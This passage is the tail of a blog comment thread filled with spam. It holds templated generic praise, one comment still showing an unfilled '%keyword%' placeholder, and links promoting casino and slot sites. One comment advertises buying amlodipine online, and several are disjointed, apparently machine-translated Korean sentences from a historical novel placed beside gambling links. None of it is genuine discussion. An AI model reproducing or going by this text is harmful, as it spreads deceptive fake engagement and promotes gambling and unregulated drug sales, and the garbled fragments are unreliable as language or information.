 790. I like the valuable information you provide in your articles. I will bookmark your weblog and check again here frequently. I am quite certain I will learn a lot of new stuff right here! Good luck for the next!

 791. strelkaproject.com
  “폐하, 폐하, 무슨 일이십니까?” 폐하의 이상한 행동을 본 Xiao Jing은 서둘러 앞으로 나아갔습니다.

 792. eggc says:

  sm-slot.com
  Zhu Houzhao는 그의 이마를 애무했고 Zhu라는 또 다른 사람이 있었는데 정말 부끄러운 일입니다.

 793. Azwfga says:

  norvasc 10mg oral buy amlodipine 10mg online buy norvasc 5mg sale

 794. lfchungary.com
  하지만 이 말이 다른 한린의 귀에 퍼지자 사람들은 경악했다.

 795. hihouse420.com
  Fang Jifan은 이마를 만졌습니다. “계속하세요.”

 796. lfchungary.com
  Hongzhi 황제는 오랫동안 침묵하고 심호흡을했습니다. “이리와 유언장을 전달하십시오.”

 797. 에그 벳 says:

  sm-slot.com
  어느 정도 Hongzhi 황제는 여전히 이것을 믿지 않았습니다.

 798. yangsfitness.com
  Fang Jifan은 오늘 일찍 일어나 뒷산으로 갔다.

 799. Geri bildirim: grandpashabet
 800. What’s Taking place i’m new to this, I stumbled upon this I have found It positively helpful and it has helped me out loads. I am hoping to give a contribution & aid other users like its helped me. Good job.

 801. dota2answers.com
  항저우는 큰 저택인데 왜 돈과 음식은 늘지 않고 줄어드는 걸까요?

 802. lfchungary.com
  아버지와 아들은 등불을 들고 눈을 크게 뜨고 놀라 소리쳤습니다.

 803. sm-casino1.com
  17일이라는 시간이 흘렀고, 수도에서는 여러 번 넘겨달라고 했지만 아직 소식이 없습니다.

 804. ruda4nik.ru says:

  I don’t even know the way I ended up here, however I thought this submit used to be good. I don’t recognise who you’re however definitely you are going to a famous blogger should you are not already. Cheers!

 805. ruda4nik.ru says:

  This is a good tip especially to those new to the blogosphere. Short but very accurate information Thank you for sharing this one. A must read article!

 806. ruda4nik.ru says:

  Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

 807. ruda4nik.ru says:

  Hmm is anyone else experiencing problems with the images on this blog loading? I’m trying to find out if its a problem on my end or if it’s the blog. Any feedback would be greatly appreciated.

 808. ruda4nik.ru says:

  When I originally commented I seem to have clicked the -Notify me when new comments are added- checkbox and now every time a comment is added I get four emails with the same comment. Perhaps there is a means you can remove me from that service? Thanks a lot!

 809. ruda4nik.ru says:

  Thanks for one’s marvelous posting! I seriously enjoyed reading it, you will be a great author. I will make sure to bookmark your blog and will come back very soon. I want to encourage you to ultimately continue your great job, have a nice weekend!

 810. ruda4nik.ru says:

  I have read so many articles or reviews concerning the blogger lovers but this post is in fact a nice post, keep it up.

 811. ruda4nik.ru says:

  Link exchange is nothing else but it is simply placing the other person’s blog link on your page at appropriate place and other person will also do same for you.

 812. ruda4nik.ru says:

  Awesome blog! Is your theme custom made or did you download it from somewhere? A design like yours with a few simple adjustements would really make my blog shine. Please let me know where you got your design. Thanks a lot

 813. ruda4nik.ru says:

  Hey! I know this is kinda off topic however I’d figured I’d ask. Would you be interested in exchanging links or maybe guest writing a blog article or vice-versa? My site goes over a lot of the same subjects as yours and I feel we could greatly benefit from each other. If you might be interested feel free to send me an e-mail. I look forward to hearing from you! Awesome blog by the way!

 814. ruda4nik.ru says:

  Hey! This is my first visit to your blog! We are a collection of volunteers and starting a new initiative in a community in the same niche. Your blog provided us valuable information to work on. You have done a outstanding job!

 815. ruda4nik.ru says:

  Quality articles or reviews is the important to be a focus for the users to visit the web site, that’s what this website is providing.

 816. ruda4nik.ru says:

  Can I simply say what a relief to find someone who truly knows what they’re talking about on the net. You certainly know how to bring an issue to light and make it important. More and more people have to look at this and understand this side of the story. It’s surprising you aren’t more popular since you surely have the gift.

 817. ruda4nik.ru says:

  Hi, i think that i saw you visited my website so i came to return the favor.I am trying to find things to improve my website!I suppose its ok to use some of your ideas!!

 818. ruda4nik.ru says:

  WOW just what I was searching for. Came here by searching for %keyword%

 819. ruda4nik.ru says:

  I got this website from my pal who informed me about this website and now this time I am visiting this web site and reading very informative articles here.

 820. ruda4nik.ru says:

  I blog quite often and I really appreciate your content. This great article has really peaked my interest. I am going to bookmark your site and keep checking for new information about once a week. I subscribed to your RSS feed as well.

 821. ruda4nik.ru says:

  Spot on with this write-up, I honestly think this site needs much more attention. I’ll probably be back again to read more, thanks for the information!

 822. ruda4nik.ru says:

  Hi, I log on to your blogs like every week. Your writing style is awesome, keep doing what you’re doing!

 823. lfchungary.com
  어린 한린은 오랫동안 참았다. “배가…돌아왔다.”

 824. smcasino-game.com
  그러나 결과는… 천마일이나 떨어진 곳에서 엄청난 급락이었습니다.

 825. 에그벳 says:

  strelkaproject.com
  샤오징은 울음을 터뜨렸다.

 826. Geri bildirim: grandpashabet
 827. lfchungary.com
  황실의 구출이 오기 전에 그가 지상의 지옥으로 떨어질까 두렵습니다.

 828. ruda4nik.ru says:

  My brother suggested I might like this blog. He was totally right. This post actually made my day. You cann’t imagine just how much time I had spent for this information! Thanks!

 829. ruda4nik.ru says:

  This article will help the internet viewers for building up new blog or even a blog from start to end.

 830. ruda4nik.ru says:

  I like the valuable information you provide in your articles. I will bookmark your weblog and check again here frequently. I am quite certain I will learn a lot of new stuff right here! Good luck for the next!

 831. ruda4nik.ru says:

  My programmer is trying to persuade me to move to .net from PHP. I have always disliked the idea because of the expenses. But he’s tryiong none the less. I’ve been using Movable-type on a number of websites for about a year and am nervous about switching to another platform. I have heard excellent things about blogengine.net. Is there a way I can transfer all my wordpress content into it? Any kind of help would be really appreciated!

 832. ruda4nik.ru says:

  I am regular reader, how are you everybody? This article posted at this website is actually nice.

 833. ruda4nik.ru says:

  I enjoy reading a post that will make people think. Also, thank you for allowing for me to comment!

 834. ruda4nik.ru says:

  Wow that was odd. I just wrote an really long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say fantastic blog!

 835. ruda4nik.ru says:

  Great post. I am going through some of these issues as well..

 836. bu.edu says:

  You really make it seem so easy with your presentation but I find this topic to be really something which I think I would never understand. It seems too complicated and very broad for me. I am looking forward for your next post, I will try to get the hang of it!

 837. pragmatic-ko.com
  그러나 모두 절름발이라는 단어를 일제히 말하자 Zhang Sheng의 얼굴이 가라 앉았습니다.

 838. pragmatic-ko.com
  “…” Fang Jifan은 눈을 깜박 였지만 이제 그는 침묵합니다.

 839. Good post. I am going through a few of these issues as well..

 840. When someone writes an article he/she keeps the thought of a user in his/her mind that how a user can understand it. Thus that’s why this piece of writing is amazing. Thanks!

 841. Hello there, simply was aware of your blog thru Google, and found that it is really informative. I’m gonna watch out for brussels. I will appreciate should you continue this in future. Many other folks might be benefited from your writing. Cheers!

 842. I have been surfing online more than 3 hours today, yet I never found any interesting article like yours. It’s pretty worth enough for me. In my opinion, if all site owners and bloggers made good content as you did, the internet will be much more useful than ever before.

 843. Hello! I could have sworn I’ve been to this blog before but after going through some of the posts I realized it’s new to me. Anyhow, I’m definitely pleased I found it and I’ll be bookmarking it and checking back frequently!

 844. you are in point of fact a good webmaster. The web site loading velocity is incredible. It kind of feels that you are doing any unique trick. In addition, The contents are masterpiece. you have performed a wonderful task in this topic!

 845. hi!,I really like your writing so much! percentage we communicate more approximately your post on AOL? I need an expert in this area to solve my problem. May be that is you! Looking forward to peer you.

 846. remstrdom.ru says:

  It is not my first time to pay a visit this site, i am visiting this web site dailly and take good data from here every day.

 847. sadounik.ru says:

  Actually no matter if someone doesn’t know then its up to other people that they will help, so here it happens.

 848. I savor, cause I found exactly what I used to be taking a look for. You have ended my 4 day long hunt! God Bless you man. Have a nice day. Bye